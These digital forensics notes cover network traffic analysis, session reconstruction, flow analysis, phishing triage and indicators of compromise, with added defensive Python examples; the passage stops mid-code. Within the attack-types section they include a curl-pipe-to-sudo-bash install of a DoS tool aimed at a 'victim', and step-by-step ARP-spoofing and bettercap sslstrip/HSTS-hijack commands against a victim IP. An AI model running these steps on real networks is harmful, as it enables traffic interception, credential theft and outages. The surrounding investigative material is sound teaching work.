Use Cases
Network Analysis
1. Network traffic investigations
Digital forensics involves the collection, analysis, and preservation of electronic evidence for use in legal proceedings. Network analysis is a crucial aspect of digital forensics and involves examining network traffic to identify any unauthorized access or activity on a network.
Network analysis can be used to identify the source and destination of network traffic, the type of traffic, and the amount of data transferred. This information can be used to determine if any unauthorized access has occurred, whether data has been stolen or tampered with, or if any malware or other malicious software has been installed on the network.
There are several tools and techniques used in network analysis for digital forensics. Some of the most common include:
1. Packet sniffing: This involves capturing and analyzing individual packets of data as they are transmitted over a network. Packet sniffers can be used to identify the source and destination of network traffic, the type of traffic, and the amount of data transferred.
1.1. Choose a packet sniffing tool: There are many packet sniffing tools available, such as Wireshark, tcpdump, and Microsoft Network Monitor. Choose a tool that is appropriate for your needs and familiarize yourself with its features.
1.2. Set up the network interface: Connect the computer to the network interface that you want to monitor. You may need to configure the network interface to ensure that it is operating correctly.
1.3. Start the packet sniffing tool: Start the packet sniffing tool and configure it to capture the network traffic on the desired network interface. You may need to specify filters to capture specific types of traffic.
1.4. Capture network traffic: Begin capturing network traffic by starting the capture process. The packet sniffing tool will record all network traffic that flows through the network interface.
1.5. Analyze captured packets: Once you have captured network traffic, you can analyze it using the packet sniffing tool. Look for patterns or anomalies in the traffic that may indicate malicious activity or other issues.
1.6. Document your findings: Document your findings in a detailed report that includes information on the packet sniffing tool used, the network interface monitored, and the network traffic captured and analyzed.
2. Protocol analysis: This involves analyzing the protocols used by different network devices to communicate with each other. By analyzing these protocols, forensic analysts can identify any unauthorized or unusual activity on the network.
2.1 Capturing network traffic: The first step in protocol analysis is to capture the network traffic between the devices on the network. This can be done using network sniffers or packet capture tools that capture and store all of the packets that are transmitted over the network.
2.2 Filtering packets: Once the packets have been captured, investigators can use filters to narrow down the packets to only those that are relevant to the investigation. For example, they may filter based on source and destination IP addresses, port numbers, or other criteria (see the Wireshark User's Guide: https://www.wireshark.org/docs/wsug_html/).
2.3 Reconstructing sessions: Investigators can then reconstruct the network sessions between devices by piecing together the packets that were exchanged. This can help them understand the flow of data between devices and identify any anomalies or suspicious activity.
2.4 Analyzing packet content: Investigators can also analyze the content of the packets themselves to identify potential threats or security incidents. For example, they may look for malware signatures or other indicators of compromise that could help them identify the type of attack that was carried out.
In digital forensics, session reconstruction is the process of analyzing network traffic logs to identify and piece together user sessions. This is a critical part of protocol analysis, as it helps investigators understand the sequence of events that occurred during a cyber-attack or other digital crime.
Here are some steps that investigators can take to reconstruct sessions during protocol analysis:
2.4.1 Collect network traffic logs: Network traffic logs capture data on all network traffic that passes through a particular device or network. Collecting these logs is the first step in reconstructing sessions.
2.4.2 Identify sessions: Using the network traffic logs, investigators can identify sessions by looking for patterns in the data that indicate user activity. For example, a session may be identified by a series of HTTP requests from a particular IP address.
· IP Address: Sessions can be identified by looking for patterns in the data that indicate user activity. For example, a session may be identified by a series of requests from a particular IP address.
· Timestamps: Sessions can also be identified by analyzing timestamps in network traffic logs. A session may be identified as a series of requests that occur within a certain time frame.
· User Agent: User agent information can be used to identify sessions. A user agent is a string of text that identifies the web browser or application being used to access a website or network. By analyzing user agent information, investigators can identify sessions associated with a particular browser or application.
· Session Cookies: Session cookies are small text files that are used to store user session information. By analyzing session cookie data, investigators can identify sessions associated with a particular user or device.
· Protocol Analysis: Protocol analysis involves analyzing network traffic logs to identify patterns in the data that indicate user activity. This can be used to identify sessions based on the types of requests being made and the responses received.
2.4.3 Reconstruct sessions: Once sessions have been identified, investigators can reconstruct them by piecing together the data from the network traffic logs. This can include information on the types of requests made, the responses received, and any data that was transmitted during the session.
Reconstructing sessions is the process of piecing together the data from network traffic logs to recreate a user's activity on a website or application. Here are some techniques that can be used to reconstruct sessions:
· Session Identification: Before reconstructing a session, it must first be identified. This can be done using the techniques listed under 2.4.2 above.
· Session Reconstruction: Once a session has been identified, the data from network traffic logs can be used to reconstruct the session. This can involve analyzing the types of requests made, the responses received, and any data that was transmitted during the session.
· Timeline Analysis: Timeline analysis involves piecing together reconstructed sessions in the order in which they occurred. This can help investigators understand the sequence of events leading up to a cyber-attack or other digital crime.
· Correlation Analysis: Correlation analysis involves comparing reconstructed sessions from different sources to identify patterns and correlations in the data. This can help investigators identify connections between different users, devices, or events.
· Data Visualization: Data visualization tools can be used to help investigators visualize reconstructed sessions and other data from network traffic logs. This can help identify patterns and anomalies that may be difficult to spot through manual analysis.
Overall, reconstructing sessions is a critical part of digital investigations, as it allows investigators to understand the sequence of events leading up to a cyber-attack or other digital crime. By piecing together data from network traffic logs, investigators can identify patterns and correlations in the data that may be difficult to spot through other means.
2.4.4 Analyze reconstructed sessions: Once sessions have been reconstructed, investigators can analyze the data to better understand the sequence of events that occurred during the attack or digital crime. This can help them identify the source of the attack, the methods used by the attacker, and the data that was compromised.
Analyzing reconstructed sessions is an important step in digital investigations, as it allows investigators to gain insight into the sequence of events that occurred during a cyber-attack or other digital crime. Here are some techniques that can be used to analyze reconstructed sessions:
· Timeline Analysis: Timeline analysis involves organizing reconstructed sessions in chronological order to identify the sequence of events leading up to a cyber-attack or other digital crime. This can help investigators identify the source of the attack and the methods used by the attacker.
· Pattern Analysis: Pattern analysis involves looking for patterns in the data that indicate a particular type of activity. For example, an attacker may use a specific set of commands or tools during a cyber-attack. By identifying these patterns, investigators can gain insight into the attacker's methods and motivations.
· Correlation Analysis: Correlation analysis involves comparing reconstructed sessions from different sources to identify connections between users, devices, or events. This can help investigators identify relationships between different parts of a cyber-attack or other digital crime.
· Keyword Analysis: Keyword analysis involves searching reconstructed sessions for specific keywords or phrases that may be relevant to the investigation. For example, an investigator may search for the name of a particular tool or malware used by the attacker.
· Statistical Analysis: Statistical analysis involves using statistical techniques to identify patterns in the data. This can help investigators identify trends and anomalies that may be difficult to spot through other means.
Overall, analyzing reconstructed sessions is a critical part of digital investigations, as it allows investigators to gain insight into the methods, motivations, and sequence of events leading up to a cyber-attack or other digital crime. By using a combination of techniques, investigators can identify patterns and correlations in the data that can help them solve complex digital crimes.
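The session identification, reconstruction, timeline and keyword analysis steps in 2.4.2 to 2.4.4, worked through in code. This is an added example, not part of the original notes: the log line format (tab-separated timestamp, client IP, session cookie, user agent, request, status), the 30-minute inactivity timeout and the sample traffic are all assumptions constructed for the demonstration.

```python
"""Session reconstruction over constructed HTTP log lines (added example)."""
from dataclasses import dataclass, field
from datetime import datetime, timedelta

# Constructed sample traffic (not real data): one browser session, a probing
# request from a scripted client, a second browser session with a new cookie,
# and a late request on the first cookie that falls outside the timeout.
LOG_LINES = """\
2024-03-01T09:00:01\t10.0.0.5\tsid=a1\tMozilla/5.0 (Windows NT 10.0)\tGET /login\t200
2024-03-01T09:00:07\t10.0.0.5\tsid=a1\tMozilla/5.0 (Windows NT 10.0)\tPOST /login\t302
2024-03-01T09:00:09\t10.0.0.5\tsid=a1\tMozilla/5.0 (Windows NT 10.0)\tGET /account\t200
2024-03-01T09:02:30\t10.0.0.9\t-\tcurl/8.4.0\tGET /admin/../../etc/passwd\t403
2024-03-01T09:41:00\t10.0.0.5\tsid=b7\tMozilla/5.0 (Windows NT 10.0)\tGET /reports/export\t200
2024-03-01T09:41:05\t10.0.0.5\tsid=b7\tMozilla/5.0 (Windows NT 10.0)\tGET /reports/export?all=1\t200
2024-03-01T10:15:00\t10.0.0.5\tsid=a1\tMozilla/5.0 (Windows NT 10.0)\tGET /account\t200
"""

SESSION_TIMEOUT = timedelta(minutes=30)  # assumed inactivity limit


@dataclass
class Request:
    ts: datetime
    ip: str
    cookie: str
    ua: str
    req: str
    status: int


@dataclass
class Session:
    key: tuple                      # (client IP, user agent, session cookie)
    requests: list = field(default_factory=list)

    @property
    def start(self):
        return self.requests[0].ts

    @property
    def end(self):
        return self.requests[-1].ts


def parse_log(text):
    """Parse the assumed tab-separated format into Request objects, oldest first."""
    out = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, ip, cookie, ua, req, status = line.split("\t")
        out.append(Request(datetime.fromisoformat(ts), ip, cookie, ua, req, int(status)))
    return sorted(out, key=lambda r: r.ts)


def reconstruct_sessions(requests, timeout=SESSION_TIMEOUT):
    """Group requests into sessions by (IP, user agent, cookie); a gap longer
    than the inactivity timeout starts a new session under the same key."""
    open_sessions, sessions = {}, []
    for r in requests:
        key = (r.ip, r.ua, r.cookie)
        s = open_sessions.get(key)
        if s is None or r.ts - s.end > timeout:
            s = Session(key)
            sessions.append(s)
            open_sessions[key] = s
        s.requests.append(r)
    return sessions


def timeline(sessions):
    """Timeline analysis: (start, end, ip, cookie, request count) in time order."""
    return [(s.start, s.end, s.key[0], s.key[2], len(s.requests))
            for s in sorted(sessions, key=lambda s: s.start)]


def keyword_hits(sessions, keywords):
    """Keyword analysis: session key -> requests containing any keyword."""
    hits = {}
    for s in sessions:
        matched = [r.req for r in s.requests if any(k in r.req for k in keywords)]
        if matched:
            hits[s.key] = matched
    return hits


if __name__ == "__main__":
    sessions = reconstruct_sessions(parse_log(LOG_LINES))
    for start, end, ip, cookie, n in timeline(sessions):
        print(f"{start:%H:%M:%S}-{end:%H:%M:%S} {ip:10} {cookie:7} {n} request(s)")
    print(keyword_hits(sessions, ["../", "/etc/passwd"]))
```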
3. Network flow analysis: This involves analyzing the flow of data between different network devices. By analyzing this flow, forensic analysts can identify any unusual patterns or behaviors that may indicate unauthorized access or activity.
· Digital forensics involves the preservation, analysis, and presentation of electronic data to reconstruct past events or activities. Network flow analysis is a subfield of digital forensics that involves the examination of network traffic to identify patterns, anomalies, and evidence of unauthorized or malicious activity.
· Network flow analysis involves capturing and analyzing data packets transmitted over a network, such as the internet or a local area network (LAN). This data can include information about the source and destination of the packet, the time it was sent, and the type of data transmitted. Network flow analysis can be used to identify network vulnerabilities, detect attacks or intrusions, and gather evidence for legal proceedings.
· The process of network flow analysis involves several steps, including data collection, analysis, and interpretation. Tools such as packet capture software, intrusion detection systems, and network traffic analyzers are used to capture and analyze network traffic data. Once the data has been collected, it can be analyzed using various techniques, such as statistical analysis, pattern recognition, and machine learning algorithms.
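A worked flow analysis, added here as an example and not taken from the original notes. It aggregates packet records into 5-tuple flows and then looks for two of the patterns the notes describe: the "many sources to a single target" shape of DoS/DDoS traffic, and the peers of a known suspect address used to scope an incident; the record layout, the thresholds, the local subnet heuristic for foreign source addresses and the sample packets are all constructed assumptions.

```python
"""Flow aggregation and pattern checks over constructed packet records (added example)."""
import ipaddress
from collections import defaultdict

# Constructed sample (not real data): one HTTPS exchange, a suspect host
# 10.0.0.9 touching SSH and SMB on two peers, and twelve external sources each
# sending one small packet to 10.0.0.80:80. Layout assumed:
# (timestamp, src, dst, proto, sport, dport, bytes)
PACKETS = [
    (1.0, "10.0.0.5", "10.0.0.80", "tcp", 51000, 443, 600),
    (1.1, "10.0.0.80", "10.0.0.5", "tcp", 443, 51000, 4000),
    (2.0, "10.0.0.9", "10.0.0.80", "tcp", 51001, 22, 120),
    (2.5, "10.0.0.9", "10.0.0.81", "tcp", 51002, 445, 90000),
    (2.6, "10.0.0.81", "10.0.0.9", "tcp", 445, 51002, 500),
]
PACKETS += [(3.0 + i / 100, f"198.51.100.{i}", "10.0.0.80", "tcp", 40000 + i, 80, 60)
            for i in range(1, 13)]


def build_flows(packets):
    """Aggregate packets into unidirectional 5-tuple flows with counts and timing."""
    flows = {}
    for ts, src, dst, proto, sport, dport, size in packets:
        key = (src, dst, proto, sport, dport)
        f = flows.setdefault(key, {"packets": 0, "bytes": 0, "first": ts, "last": ts})
        f["packets"] += 1
        f["bytes"] += size
        f["first"] = min(f["first"], ts)
        f["last"] = max(f["last"], ts)
    return flows


def fan_in(flows, min_sources=10):
    """Targets (dst, proto, dport) contacted by at least min_sources distinct
    sources: the 'high volume from multiple sources to a single target' pattern."""
    sources = defaultdict(set)
    for (src, dst, proto, _sport, dport) in flows:
        sources[(dst, proto, dport)].add(src)
    return {t: len(s) for t, s in sources.items() if len(s) >= min_sources}


def peers_of(flows, host):
    """Every address the given host exchanged data with, bytes each way and the
    destination ports it used: the scoping step once one address is known."""
    peers = defaultdict(lambda: {"sent": 0, "received": 0, "ports": set()})
    for (src, dst, _proto, _sport, dport), f in flows.items():
        if src == host:
            peers[dst]["sent"] += f["bytes"]
            peers[dst]["ports"].add(dport)
        elif dst == host:
            peers[src]["received"] += f["bytes"]
    return dict(peers)


def foreign_sources(flows, local_net):
    """Source addresses outside the local network seen on an internal capture.
    A heuristic assumed here for forged or spoofed sources, not a proof of it."""
    net = ipaddress.ip_network(local_net)
    return sorted({src for (src, *_rest) in flows
                   if ipaddress.ip_address(src) not in net})


if __name__ == "__main__":
    flows = build_flows(PACKETS)
    print("fan-in targets:", fan_in(flows))
    print("peers of 10.0.0.9:", peers_of(flows, "10.0.0.9"))
    print("foreign sources:", foreign_sources(flows, "10.0.0.0/24"))
```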
There are several types of network traffic analyzers, including:
· Packet capture tools: These tools capture individual packets of data as they travel across a network, allowing for in-depth analysis of packet headers and contents. Examples: Wireshark is a widely used open-source packet capture and analysis tool; it supports a wide range of protocols and provides detailed packet-level analysis. Tcpdump is a command-line packet capture tool that runs on various operating systems, including Linux and macOS; it can capture packets in real time or from stored data files and provides filtering and analysis capabilities.
· Network performance monitoring tools: These tools monitor network traffic to identify and troubleshoot network performance issues, such as slow response times, packet loss, and bandwidth utilization. Examples: Wireshark; Paessler Router Traffic Grapher (PRTG), a network monitoring tool that can monitor traffic, applications, and devices in real time; Microsoft Network Monitor.
· Protocol analyzers: These tools decode and analyze network protocols, such as TCP/IP, HTTP, and SMTP, to identify potential security vulnerabilities and troubleshoot network issues.
· Intrusion detection/prevention systems: These tools monitor network traffic for signs of malicious activity, such as viruses, malware, and unauthorized access attempts.
4. Network mapping: This involves creating a map of the network infrastructure, including all connected devices, routers, switches, and servers. By mapping the network, forensic analysts can identify any potential vulnerabilities or weaknesses that may have been exploited by an attacker.
Network mapping tools can be used to identify the devices, protocols, and services that are running on a network, as well as the relationships between them. This information can be used to identify potential vulnerabilities, misconfigurations, and other issues that could pose a threat to the security and integrity of the network.
Some common network mapping tools used in digital forensics include:
· Nmap: This is a popular open-source tool that can be used to scan networks and identify hosts, services, and operating systems.
· Wireshark: This is a network protocol analyzer that can be used to capture and analyze network traffic in real time.
· Netstat: This is a command-line tool that can be used to display active network connections, open ports, and other network-related information.
· Nessus: This is a vulnerability scanner that can be used to identify potential security weaknesses in a network.
· Fping: This is a ping utility that can be used to quickly scan a network and identify active hosts.
Overall, network mapping tools are an important part of the digital forensics toolkit and can be used to help investigators identify potential sources of evidence and analyze the overall security posture of a network.
In summary, network analysis is a crucial aspect of digital forensics that involves examining network traffic to identify any unauthorized access or activity on a network. There are several tools and techniques used in network analysis, including packet sniffing, protocol analysis, network flow analysis, and network mapping.
Scenario: A company's network has been breached and sensitive information has been stolen. The IT department has identified the IP address of the suspected attacker and provided it to the digital forensics team for analysis.
Steps for Network Analysis:
Identify the network traffic associated with the IP address: The digital forensics team can use network traffic analysis tools such as Wireshark or tcpdump to capture and analyze the network traffic associated with the IP address of the attacker.
Tcpdump: By putting a network interface into promiscuous mode we can capture all traffic for the gateway. To check whether eth0 is in promiscuous mode, run ifconfig and look for the PROMISC flag.
In order to capture network traffic from other computers on the network using Wireshark, you will need to be connected to a hub, a switch in "monitor" mode, or use ARP poisoning to redirect traffic to your machine. Here are the general steps to capture network traffic from other computers using Wireshark:
// for wireless interfaces: https://www.youtube.com/watch?v=Hl0IpoS503A
$ sudo ifconfig eth0 promisc
$ sudo tcpdump host 192.168.0.1   # captures traffic between this host and the remote host 192.168.0.1
or
$ sudo tcpdump net 192.168.0.0/24   # captures traffic to or from any host in the 192.168.0.0/24 network
Alternatively, run Wireshark. To capture the traffic of a remote host on the local network, use ARP spoofing with Ettercap and open Wireshark to see the sniffed traffic: https://www.youtube.com/watch?v=r0l_54thSYU
Examine the packets: The team can examine the packets captured to identify any suspicious traffic, such as data exfiltration attempts or unauthorized access attempts.
· Capture the network traffic: Start capturing the network traffic using a tool like Wireshark or tcpdump. You can capture traffic on a specific network interface, or you can capture traffic between specific hosts or over specific protocols.
· Filter the traffic: Once you have captured the traffic, filter the packets to focus on the traffic of interest. For example, you can filter packets based on IP address, protocol, port number, or other criteria.
· Analyze the packets: Once you have filtered the packets, analyze them in detail to identify any suspicious activity. Look for anomalies in the traffic, such as unusual packet sizes, protocol violations, or unexpected traffic patterns.
· Reconstruct the sessions: In some cases, it may be necessary to reconstruct the sessions to get a more complete picture of the network activity. This involves analyzing the packets in sequence to identify the different stages of the session.
· Document your findings: As you analyze the packets, document your findings in detail. Take screenshots of relevant packets and highlight any suspicious activity. Be sure to document the time, date, and location of the activity, as well as any other relevant information.
· Draw conclusions: Once you have analyzed the packets and documented your findings, draw conclusions about the network activity. Identify any security threats or breaches, and recommend steps to mitigate the risk.
Determine the type of attack: Based on the traffic analysis, the team can determine the type of attack used by the attacker, whether it was a brute-force attack, SQL injection, or another type of attack.
· Determining the type of attack based on traffic analysis can be challenging, as different types of attacks can produce similar traffic patterns. However, here are some common types of attacks and the traffic patterns they may produce:
· Denial-of-service (DoS) attack: A DoS attack floods a network or system with traffic, causing it to become unavailable. The traffic pattern for a DoS attack may show a high volume of traffic from multiple sources to a single target, often using a particular protocol or port.
1. Install Raven-Storm on Linux.
2. curl -s https://raw.githubusercontent.com/Taguar258/Raven-Storm/master/install.sh | sudo bash -s
3. https://www.youtube.com/watch?v=wsAtq28V0JU
4. On victim
· Distributed denial-of-service (DDoS) attack: A DDoS attack is similar to a DoS attack, but it uses a botnet of compromised devices to flood the target with traffic. The traffic pattern for a DDoS attack may show traffic from multiple sources to a single target, often with a high volume of traffic and a large number of packets per second.
· Man-in-the-middle (MitM) attack: A MitM attack intercepts and alters traffic between two parties, allowing the attacker to eavesdrop or modify the communication. The traffic pattern for a MitM attack may show traffic between two parties with an additional party intercepting and possibly modifying the traffic.
· Spoofing attack: A spoofing attack involves an attacker forging or disguising their identity or the source of their traffic. The traffic pattern for a spoofing attack may show traffic with a falsified source IP address or other identifying information.
ARP Poisoning: How ARP Poisoning Works // Man-in-the-Middle - YouTube
- It uses MAC addresses: arp -a
- In ARP poisoning I'm telling the victim that I'm the gateway, and telling the gateway I'm the victim.
- sysctl -w net.ipv4.ip_forward=1: this command allows the attacker to forward traffic from the victim to the gateway.
- cat /proc/sys/net/ipv4/ip_forward (Linux IP forwarding - How to Disable/Enable using net.ipv4.ip_forward, linuxconfig.org)
- Now we can capture all HTTP traffic using Wireshark.
- SSL intercept: Man-in-the-Middle Attack
- Using the Bettercap tool: Capturing Network Traffic with Bettercap - HTTP/HTTPS - YouTube
1. sysctl -w net.ipv4.ip_forward=1
2. sudo apt install bettercap
3. bettercap
4. caplets.update
5. help
6. net.probe on
7. net.show
8. set arp.spoof.fullduplex true
9. set arp.spoof.target 192.168.7.1 (victim IP)
10. set http.proxy.sslstrip true
11. create file.pcap
12. net.sniff on
13. set net.sniff.output /home/sansforensics/Desktop/cases/hi.pcap
14. set http.proxy.sslstrip true
15. net.sniff on
We can use this to check that sslstrip is installed correctly.
16. set http.proxy.sslstrip true
17. hstshijack/hstshijack
18. arp.spoof true
19. net.sniff true
20. net.probe true
Now send a link to the victim without https, or when the victim browses a web site it starts without https!!!
· Phishing attack: A phishing attack uses social engineering to trick a user into divulging sensitive information. The traffic pattern for a phishing attack may show traffic to a fake login page or other spoofed website, often with a high volume of traffic from a single source.
Phishing attacks are a type of cyberattack in which an attacker sends fraudulent emails, text messages, or other forms of communication to trick recipients into providing sensitive information such as passwords, credit card numbers, or other personal data. Digital forensics can be used to investigate and respond to phishing attacks.
When investigating a phishing attack, digital forensics experts can analyze the phishing email or other communication to determine its origin and any clues about the attacker's identity. They can also examine any attachments or links included in the email to identify any malware that may have been downloaded onto the victim's computer or network.
In addition, digital forensics experts can track any communications or financial transactions that may have resulted from the phishing attack, such as unauthorized purchases or money transfers. They can also investigate any related data breaches that may have occurred as a result of the attack.
To prevent phishing attacks, digital forensics experts can conduct security audits and risk assessments to identify vulnerabilities in an organization's systems and processes. They can also train employees to recognize and report phishing attempts and implement security measures such as multi-factor authentication and email filtering to reduce the risk of successful attacks.
An example scenario of a phishing attack and how digital forensics can be used to investigate it:
A company employee receives an email that appears to be from their bank, asking them to click on a link to confirm their account details.
1. The employee clicks on the link and enters their login credentials.
2. Shortly thereafter, the employee notices suspicious activity on their bank account, including unauthorized transactions.
3. The company's IT department is notified and calls in digital forensics experts to investigate the incident.
4. The digital forensics team collects data from the employee's computer, including email headers, browser history, and any downloaded files or attachments.
5. The email header information is analyzed to determine the sender's IP address and other metadata.
6. The link that the employee clicked on is examined to determine if it led to a legitimate website or a phishing page.
7. The employee's computer is scanned for malware or other indicators of a security breach.
8. The digital forensics team traces the unauthorized transactions on the employee's bank account and identifies any other related incidents.
9. Based on the evidence collected, the digital forensics team identifies the source of the phishing attack and any accomplices involved.
10. The company takes steps to mitigate the damage caused by the attack, such as freezing the affected bank account and changing the employee's login credentials.
11. The company implements new security measures, such as email filtering and employee training, to prevent future phishing attacks.
· Note that these are just a few examples of common attack types, and that the traffic patterns for each type can vary depending on the specific attack and the attacker's techniques. It is important to use multiple indicators of compromise (IOCs) and analysis techniques to accurately identify the type of attack.
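Steps 5 and 6 of the phishing scenario above (header analysis to recover the sender's IP, and checking where the clicked link really led), carried out in code. This is an added example, not part of the original notes: the message, the hostnames and the addresses in it are constructed placeholders, and the checks assume a single-part message with unfolded-compatible Received headers as shown.

```python
"""Phishing e-mail triage over a constructed message (added example)."""
import email
import re
from email.utils import parseaddr
from html.parser import HTMLParser
from urllib.parse import urlparse

# Constructed message (not a real e-mail). The visible From claims the bank's
# domain; Reply-To, Return-Path, the originating relay and the link target
# all point elsewhere.
RAW_EMAIL = """\
Return-Path: <billing@examplebank-verify.test>
Received: from mail.victim-corp.test (mail.victim-corp.test [10.0.0.25])
\tby mx.victim-corp.test with ESMTP id 123; Fri, 01 Mar 2024 09:00:10 +0000
Received: from mailer.examplebank-verify.test (unknown [203.0.113.77])
\tby mail.victim-corp.test with ESMTP id 122; Fri, 01 Mar 2024 09:00:05 +0000
From: "Example Bank" <support@examplebank.test>
Reply-To: billing@examplebank-verify.test
To: employee@victim-corp.test
Subject: Confirm your account details
Content-Type: text/html; charset="utf-8"

<html><body><p>Please <a href="http://examplebank-verify.test/confirm">
https://www.examplebank.test/login</a> to confirm your details.</p>
<p>Contact <a href="https://www.examplebank.test/help">our help page</a>.</p>
</body></html>
"""

IP_RE = re.compile(r"\[(\d{1,3}(?:\.\d{1,3}){3})\]")


def load_message(raw):
    return email.message_from_string(raw)


def received_chain(msg):
    """Relay IPs from the Received headers, originating hop first. Each relay
    prepends its own header, so the last header is the earliest hop; only the
    hop added by your own mail server can be trusted, earlier ones are forgeable."""
    hops = []
    for hdr in reversed(msg.get_all("Received", [])):
        m = IP_RE.search(hdr)
        if m:
            hops.append(m.group(1))
    return hops


def _domain(addr):
    return addr.rsplit("@", 1)[-1].lower() if "@" in addr else ""


def sender_mismatches(msg):
    """Identity headers whose domain differs from the displayed From domain."""
    from_dom = _domain(parseaddr(msg.get("From", ""))[1])
    out = {}
    for name in ("Reply-To", "Return-Path"):
        dom = _domain(parseaddr(msg.get(name, ""))[1])
        if dom and dom != from_dom:
            out[name] = dom
    return out


class _Links(HTMLParser):
    """Collect (href, visible text) for every anchor in the HTML body."""
    def __init__(self):
        super().__init__()
        self.links, self._href, self._text = [], None, []

    def handle_starttag(self, tag, attrs):
        if tag == "a":
            self._href, self._text = dict(attrs).get("href"), []

    def handle_data(self, data):
        if self._href is not None:
            self._text.append(data)

    def handle_endtag(self, tag):
        if tag == "a" and self._href is not None:
            self.links.append((self._href, "".join(self._text).strip()))
            self._href = None


def link_mismatches(msg):
    """Anchors whose visible text shows a URL on a different host than the href,
    the classic 'looks like the bank, goes somewhere else' phishing link."""
    body = msg.get_payload(decode=True).decode("utf-8", "replace")
    parser = _Links()
    parser.feed(body)
    out = []
    for href, text in parser.links:
        shown = urlparse(text).netloc if "://" in text else ""
        if shown and shown != urlparse(href).netloc:
            out.append((text, href))
    return out


if __name__ == "__main__":
    msg = load_message(RAW_EMAIL)
    print("received chain:", received_chain(msg))
    print("sender mismatches:", sender_mismatches(msg))
    print("link mismatches:", link_mismatches(msg))
```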
Determine the extent of the attack: The team can determine the extent of the attack by examining the traffic captured and identifying any other IP addresses that the attacker communicated with.
· Determining the extent of an attack is an important part of a digital forensics investigation. Here are some steps that can be taken to determine the extent of an attack:
· Identify the initial point of entry: Digital forensics experts can trace the initial point of entry of the attack by examining logs, network traffic, and system files. This can help identify the vulnerability that was exploited to gain access to the system.
Identifying the initial point of entry is an important aspect of a digital forensics investigation as it can help determine how the attack was carried out and the extent of the damage caused. Here are some steps that can be taken to identify the initial point of entry in a digital forensics investigation:
1. Analyze logs: Digital forensics experts can analyze logs from various systems, including firewalls, intrusion detection systems, and servers to determine if any unusual activity was detected. This can provide information on the IP address or domain name that was used to initiate the attack.
2. Check system files: Digital forensics experts can check system files, such as web server logs, application logs, and error logs, to identify any unusual activity that may have occurred. This can help identify the specific vulnerability or exploit that was used to gain access to the system.
3. Interview witnesses: Digital forensics experts can interview witnesses to gain information on any unusual activity they may have observed, such as suspicious emails or pop-ups. This can help identify the initial point of entry and provide insights into the tactics used by the attacker.
4. Analyze network traffic: Digital forensics experts can analyze network traffic to determine if any unusual or suspicious activity occurred. This can help identify the IP address or domain name that was used to initiate the attack and the type of attack that was carried out.
5. Examine malware: If malware was used in the attack, digital forensics experts can examine the malware to determine how it was introduced into the system. This can help identify the initial point of entry and provide information on the specific vulnerability or exploit that was used.
By following these steps, digital forensics experts can identify the initial point of entry and gain insights into the tactics used by the attacker. This information can be used to strengthen the security posture of the system and prevent future attacks.
There are several digital forensics tools that can be used to identify the initial point of entry in an attack. Here are some examples:
· Wireshark: Wireshark is a network protocol analyzer that can be used to capture and analyze network traffic. By examining network traffic, Wireshark can help identify the IP address or domain name that was used to initiate the attack.
· Log analysis tools: There are many log analysis tools available that can be used to analyze logs from various systems, including firewalls, intrusion detection systems, and servers. These tools can help identify any unusual activity that may have occurred and provide information on the initial point of entry.
· Memory analysis tools: Memory analysis tools can be used to examine the memory of a system to identify any suspicious processes or malware that may have been introduced into the system. This can help identify the initial point of entry and provide information on the specific vulnerability or exploit that was used.
· Malware analysis tools: If malware was used in the attack, malware analysis tools can be used to examine the malware to determine how it was introduced into the system. This can help identify the initial point of entry and provide information on the specific vulnerability or exploit that was used.
· Digital forensics suites: There are many digital forensics suites available that combine multiple tools and techniques to help identify the initial point of entry. Examples include EnCase, AccessData Forensic Toolkit, and FTK Imager.
· Identify the scope of the attack: Once the point of entry is identified, digital forensics experts can analyze the extent of the damage caused by the attack. This can involve identifying the systems or data that have been compromised, the number of users affected, and the duration of the attack.
Steps that can be taken to identify the scope of the attack in a digital forensics investigation:
1. Determine the timeline of the attack: Digital forensics experts can analyze logs, system files, and other data sources to determine the timeline of the attack. This can help identify the specific systems or data that were compromised and the extent of the damage caused.
2. Analyze the type of attack: Different types of attacks have different scopes. For example, a malware attack may compromise a single system, while a network-based attack may compromise multiple systems. By analyzing the type of attack, digital forensics experts can gain insights into the scope of the attack.
3. Analyze the data that was accessed or stolen: If data was accessed or stolen in the attack, digital forensics experts can analyze the data to determine the scope of the attack. This can help identify the specific types of data that were compromised and the systems or applications that were affected.
4. Interview witnesses and system owners: Digital forensics experts can interview witnesses and system owners to gain insights into the scope of the attack. This can help identify any systems or data that were compromised that may not have been detected through other means.
5. Check for indicators of compromise: Indicators of compromise (IOCs) can provide insights into the scope of the attack. Digital forensics experts can analyze IOCs, such as IP addresses, domain names, and file hashes, to determine the extent of the damage caused.
Indicators of compromise (IOCs) are pieces of evidence
or artifacts that suggest that a security incident has occurred or is currently
ongoing. IOCs can be used by security professionals to detect and respond to
security incidents, as well as to prevent future attacks. Here are some
examples of IOCs:
1. IP addresses: IP addresses are a common type of IOC.
They can be used to identify the source or destination of network traffic
associated with a security incident. For example, if an attacker uses a
specific IP address to launch a phishing attack, that IP address can be added
to a blacklist to prevent future attacks.
2. Domain names: Domain names can also be used as IOCs.
Attackers may use domain names to host phishing sites or command and control
servers used for malware. Identifying these domains can help block or take down
the malicious infrastructure.
3. File hashes: File hashes, such as MD5, SHA-1, and
SHA-256, can be used to identify malware or other suspicious files. By
comparing file hashes to known malware samples, security professionals can
quickly determine if a file is malicious.
4. Registry keys: Registry keys are settings within the
Windows registry that can be used to configure system settings or run processes
at startup. Attackers may create or modify registry keys to maintain
persistence on a compromised system. Identifying these keys can help detect and
remove malicious activity.
5. Behavioral indicators: Behavioral indicators, such as
unusual network traffic, process activity, or system events, can also be used
as IOCs. For example, if a process attempts to connect to a command and control
server or attempts to access sensitive data, that may be an indication of a
security incident.
By collecting and analyzing IOCs, security professionals can detect and respond to security incidents more quickly and effectively, reducing the impact of the incident and preventing future attacks.
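As an added example (not part of this write-up), the matching step the list describes, run over constructed log lines from a proxy, an EDR agent and a DNS server: the IOC values, the log lines and the extraction regexes are all constructed here and come from no real incident.

```python
import re
from typing import Dict, List, Set

# Constructed IOC set (placeholder values, not real indicators).
IOCS: Dict[str, Set[str]] = {
    "ip": {"203.0.113.45"},
    "domain": {"update-check.example"},
    "sha256": {"d2d2" + "0" * 60},  # constructed 64-hex placeholder hash
}

IP_RE = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b")
DOMAIN_RE = re.compile(r"\b(?:[a-z0-9-]+\.)+[a-z]{2,}\b", re.IGNORECASE)
SHA256_RE = re.compile(r"\b[0-9a-f]{64}\b", re.IGNORECASE)

# Constructed log lines from three sources (proxy, EDR, DNS).
LOGS = [
    "2023-03-08 20:08:44 proxy src=10.0.0.7 dst=203.0.113.45 host=update-check.example uri=/test/",
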